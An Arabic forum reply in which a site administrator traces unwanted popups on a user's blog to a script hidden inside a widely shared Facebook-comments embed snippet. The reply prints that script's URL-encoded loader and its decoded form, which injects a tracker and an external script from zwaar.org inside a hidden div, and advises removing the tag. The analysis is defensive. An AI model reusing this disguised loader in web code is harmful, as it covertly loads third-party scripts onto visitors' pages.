08-05-2012, 02:58 AM
|
#11
|
مدير عام
تاريخ التسجيل: Apr 2012
الدولة: جده
المشاركات: 2,846
|
رد: طلب صعب شويه
اقتباس:
المشاركة الأصلية كتبت بواسطة Aero
هو مش بيظهر كتير على فكرة بس علشان انا بشتغل كتير عليه وبتظهر النوافذ الأجبارية دى وبلاقى فوق رقم id وده اللى مدايقنى ان حد ياخد مجهودى
|
فعلا هي موجودة
وأبشر أخي لقد وجدته 
وهو مزروع في أحد أكواد تعليقات الفيسبوك ولا حول ولا قوة إلا بالله على الاستغلال
المهم لما بحثت عن كلمة zwaar لم أجد له أثر لذلك فقلت أن الطريقة الوحيدة أن يكون في ملف Java لذلك بحثت عن أكواد الجافا (بحثت عن .js)
ووجدت أن الكود المشكوك فيه هو : http://sites.google.com/site/javacodehtml/fb.js
المهم حملت الملف ووجدته مشفر :
كود PHP:
document.write( unescape( '%3C%64%69%76%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%3B%22%3E%0A%3C%73%63%72%69%70%74%20%69%64%3D%22%5F%77%61%75%68%64%6C%22%3E%76%61%72%20%5F%77%61%75%20%3D%20%5F%77%61%75%20%7C%7C%20%5B%5D%3B%20%5F%77%61%75%2E%70%75%73%68%28%5B%22%73%6D%61%6C%6C%22%2C%20%22%32%6C%72%6F%70%33%6E%64%39%6A%33%68%22%2C%20%22%68%64%6C%22%5D%29%3B%0A%28%66%75%6E%63%74%69%6F%6E%28%29%20%7B%76%61%72%20%73%3D%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%22%73%63%72%69%70%74%22%29%3B%20%73%2E%61%73%79%6E%63%3D%74%72%75%65%3B%0A%73%2E%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%69%64%67%65%74%73%2E%61%6D%75%6E%67%2E%75%73%2F%73%6D%61%6C%6C%2E%6A%73%22%3B%0A%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%22%68%65%61%64%22%29%5B%30%5D%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%29%3B%0A%7D%29%28%29%3B%3C%2F%73%63%72%69%70%74%3E%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%7A%77%61%61%72%2E%6F%72%67%2F%63%6F%64%65%2E%6A%73%3F%69%64%3D%32%36%36%35%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F%64%69%76%3E' ) );
بعد أن فككت التشفير شوف ماذا وجدت :
كود:
document.write( unescape( '<div style="display:none;">
<script id="_wauhdl">var _wau = _wau || []; _wau.push(["small", "2lrop3nd9j3h", "hdl"]);
(function() {var s=document.createElement("script"); s.async=true;
s.src="http://widgets.amung.us/small.js";
document.getElementsByTagName("head")[0].appendChild(s);
})();</script>
<script type="text/javascript" src="http://zwaar.org/code.js?id=2665"></script>
</div>' ) );
أرى أن الكود لا علاقة له بالفيسبوك أبدا
جرب تحذف الكود التالي ورد علينا خبر:
كود:
<script src='http://sites.google.com/site/javacodehtml/fb.js' type='text/javascript'/>
والمصيبة أن العديد من المدونات تتداول الكود نفسه والطريقة نفسها لتركيب تعليقات الفيسبوك 
__________________
|
|
|